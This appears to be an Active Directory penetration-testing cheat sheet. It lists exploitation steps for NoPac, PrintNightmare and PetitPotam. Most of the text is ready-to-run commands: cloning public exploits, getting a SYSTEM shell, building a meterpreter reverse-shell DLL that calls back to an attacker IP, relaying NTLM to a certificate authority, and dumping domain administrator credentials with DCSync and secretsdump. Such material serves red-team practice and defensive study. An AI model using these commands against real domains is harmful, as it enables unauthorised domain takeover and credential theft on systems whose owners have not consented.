- NoPac is an intra-domain privilege escalation exploit that allows escalating privileges from any standard user to domain admin level access
- This exploit path takes advantage of being able to change the SamAccountName of a computer account to that of a Domain Controller.
- The flow of the attack is outlined here: SecureWorks Blog
Exploiting NoPac:
- Get the NoPac exploit:
git clone https://github.com/Ridter/noPac.git
- Check if target is vulnerable:
sudo python3 scanner.py domain.name/validuser:validpassword -dc-ip -use-ldap
- Get a SYSTEM shell as the built-in administrator:
sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip -dc-host DC-NAME -shell --impersonate administrator -use-ldap
- Perform DCSync against the built-in administrator:
sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip -dc-host DC-NAME --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN.NAME/administrator
- Vulnerability found in the Print Spooler service that runs on all Windows operating systems that allows for privilege escalation and remote code execution.
Exploiting PrintNightmare:
Get the exploit:
git clone https://github.com/cube0x0/CVE-2021-1675.git
Install cube0x0's version of impacket:
pip3 uninstall impacket git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py install
Check if the Windows target has MS-PAR & MSRPRN exposed:
rpcdump.py @ | egrep 'MS-RPRN|MS-PAR'
Generate a DLL payload to be used by the exploit to gain a shell session:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local-ip LPORT=anyport -f dll > backupscript.dll
Create an SMB server and host a shared folder (Data) at the location of the DLL payload that the exploit will attempt to download:
sudo smbserver.py -smb2support Data /path/to/backupscript.dll
Run the exploit:
sudo python3 CVE-2021-1675.py domain.name/validusername:validpassword@DC-IP '\\attacker-ip\CompData\backupscript.dll'
- PetitPotam is an LSA spoofing vulnerability that allows forcing the domain controller to authenticate against another host using NTLM over port 445
- This attack allows an unauthenticated user to take over the domain
- More information about PetitPotam can be found here: DirkJanm Post
Exploiting PetitPotam:
- Start an NTLM relay:
sudo ntlmrelayx.py -debug -smb2support --target http://DOMAIN/URL/to/Certificate/Authoirty/host --adcs --template DomainController
Note: you can use certi to find the location of the CA - Get Petit Potam:
git clone https://github.com/topotam/PetitPotam.git
- Run Petit Potam. `python3 PetitPotam.py attacker-ip dc-ip
- If it worked, you will find the base64 encoded certificate for the domain controller on the NTLM relay shell
- Request a TGT for the domain controller using the certificate:
python3 /PKINITtools/gettgtpkinit.py DOMAIN.NAME/DC-NAME\$ -pfx-base64 <base64 certificate> = dc01.ccache
- Set the KRB5CCNAME environment variable to the previous output file:
export KRB5CCNAME=dc01.ccache
- Perform DCSync using (
) the previous ccache file :secretsdump.py -just-dc-user DOMAIN.NAME/administrator -k -no-pass DC-NAME.DOMAIN.NAME